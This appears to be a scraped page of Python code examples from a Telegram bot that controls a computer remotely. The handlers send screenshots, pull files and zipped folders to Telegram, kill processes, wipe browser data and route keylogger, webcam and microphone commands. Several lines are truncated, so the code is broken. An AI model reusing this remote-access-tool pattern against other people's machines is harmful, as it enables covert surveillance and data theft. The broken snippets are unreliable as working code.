Example #1
def Information(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "INFORMATION"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Log
    Logger.Log(f"Command >> Get system info", chatid)
    # Create microphone controller keyboard
    markup = telebot.types.InlineKeyboardMarkup(row_width=1)
        telebot.types.InlineKeyboardButton(text="▶️ RAM",
        telebot.types.InlineKeyboardButton(text="▶️ Boot",
        telebot.types.InlineKeyboardButton(text="▶️ Disks",
        telebot.types.InlineKeyboardButton(text="▶️ System",
        telebot.types.InlineKeyboardButton(text="▶️ Processor",
    bot.send_message(chatid, "⚙️ System information:", reply_markup=markup)
Example #2
def Authorize(message):
    token = message.text[11:]
    chatid = message.chat.id
    username = message.chat.username
    username = Messages.user.name_anonymous if username is None else username
    # Prevent authorization if user is banned
    ban_state, reason = BanManager.UserIsBanned(chatid)
    if ban_state is True:
        return bot.send_message(chatid, Messages.auth.user_is_banned % reason)
    # If user is already authorized
    if Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.already_authorized)
    # Check user auth password
    verify_state, name = VerifyToken(token)
    if verify_state is True:
        # Log user auth event
        Logger.Log(f"Auth >> Logged in successfully using token {name}",
        # Delete message with token
        bot.delete_message(chatid, message.message_id)
        # Get session expire time
        expire = ctime(time() + auth_expire_time)
        # Insert user to database
        Database.AuthorizeUser(chatid, name)
            chatid, Messages.auth.user_authorized % (username, name, expire))
        attempts = BanManager.GetAttempts(chatid)
        # Ban user
        if attempts == 0:
            Logger.Log(f"Auth >> User banned, reason: 'Token bruteforce'",
            BanManager.BanUser(chatid, username, True, "Token bruteforce")
                             Messages.auth.user_is_banned % "Bruteforce")
            attempts -= 1
                f"Auth >> Failed log in using token {token}, attempt left {attempts}",
            BanManager.SetAttempts(chatid, username, attempts)
            bot.send_message(chatid, Messages.auth.incorrect_token % attempts)
Example #3
def Deauthorize(message):
    chatid = message.chat.id
    username = message.chat.username
    username = Messages.user.name_anonymous if username is None else username
    # If user is not authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Deauthorize user
    Logger.Log(f"Auth >> User logged out", chatid)
    bot.send_message(chatid, Messages.auth.user_deauthorized % username)
Example #4
def Permissions(message):
    chatid = message.chat.id
    # If user is not authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Log
    Logger.Log(f"Command >> Get permissions", chatid)
    # Get perms list
    token = Database.GetUserToken(chatid)
    perms = EnumeratePermissions(token, False, False)
    bot.send_message(chatid, "💎 " + perms)
Example #5
def ReceiveFile(message: dict, bot) -> None:
    chatid = message.chat.id
    name = message.document.file_name
    info = bot.get_file(message.document.file_id)
    # Log
    Logger.Log(f"Transfer >> Receive file '{name}' from telegram", chatid)
    # Save document
    content = bot.download_file(info.file_path)
    with open(name, "wb") as file:
    bot.send_message(chatid, Messages.download_file_success % name)
Example #6
def Screenshot(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "SCREENSHOT"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Log
    Logger.Log(f"Screenshot >> Get desktop screenshot", chatid)
    # Create desktop screenshot & send to user
    bot.send_chat_action(chatid, "upload_photo")
Example #7
def Uninstall(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "UNINSTALL"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Log
    Logger.Log(f"Command >> Uninstall service", chatid)
    # Execute commands
    bot.send_message(chatid, Messages.services.stub_uninstall)
Example #8
def MakeFileAction(callback: dict, bot) -> None:
    file = path.abspath(callback.data[3:])
    action = FILE_ACTIONS[callback.data[:3]]
    chatid = callback.from_user.id

    # Log
    Logger.Log(f"Filemanager action '{action}', taget file: '{file}'", chatid)
    # Action
    if action == "Open":
        OpenPath(file, chatid, bot)
    elif action == "Delete":
        DeletePath(file, chatid, bot)
    elif action == "Download":
        UploadFile(file, chatid, bot)
Example #9
def UploadFile(tfile, chatid, bot) -> None:
    # Log
    Logger.Log(f"Transfer >> Upload file '{tfile}' to telegram", chatid)
    # If file not exists
    if not path.exists(tfile):
        return bot.send_message(chatid, Messages.upload_path_not_found % tfile)
    # Download file
    if path.isfile(tfile):
        with open(tfile, "rb") as file:
            bot.send_document(chatid, file,
                caption="📄 " + path.abspath(tfile)
    # Archive and download directory
        obj = BytesIO()
        with ZipFile(obj, "w", compression=ZIP_DEFLATED) as archive:
            for root, dirs, files in walk(tfile):
                for file in files:
                    archive.write(path.join(root, file))
        bot.send_document(chatid, obj.getvalue(),
            caption="🗃 " + path.abspath(tfile)
Example #10
def KeyboardActions(callback):
    text = callback.data
    chatid = callback.from_user.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)

    # Microphone controls
    if "Microphone" in text:
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "MICROPHONE"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle microphone command

    # Webcam controls
    elif "Webcam" in text:
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "WEBCAMERA"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle webcam command
    # WebcamRecorder.Handle(callback, bot)

    # Keylogger controls
    elif "Keylogger" in text:
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "KEYLOGGER"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle keylogger command
        #Keylogger.Handle(callback, bot)

    # Filemanager controls
    elif text[:2] in ("FA", "FC"):
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "FILEMANAGER"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle filemanager command
        if text[:2] == "FA":
            Files.OpenFileActionsMenu(callback, bot)
        elif text[:2] == "FC":
            Files.MakeFileAction(callback, bot)

    # System info
    elif text[:4] == "INFO":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "INFORMATION"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle system info command
        SystemInfo.Handle(callback, bot)
    # Process manager
    elif text[:2] == "TM":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "TASKMANAGER"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle taskmanager command
        ProcessManager.KillProcess(callback, bot)
    # Volume control
    elif text[:2] == "VL":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "VOLUME"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Get level
        if "GET" in text:
            return bot.send_message(
                Messages.services.volume_get_level % VolumeLevel.Get() + "%")
            # Set level
            level = int(text.split("_")[-1])
            return bot.send_message(
                chatid, Messages.services.volume_set_level % level + "%")
    # Power control
    elif text[:5] == "POWER":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "POWER"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle taskmanager command
        Power.Handle(callback, bot)
    # Keyboard special keys
    elif text[:6] == "SNDKEY":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "KEYBOARD"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
    #  Keyboard.SendKeyPress(text.split("_")[-1], chatid)
    # Wipe browsers data
    elif text[:4] == "Wipe":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "WIPE"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Log
        Logger.Log(f"Command >> Wipe browsers data", chatid)
        # Wipe
        Wipe.WipeBrowserData(callback, bot)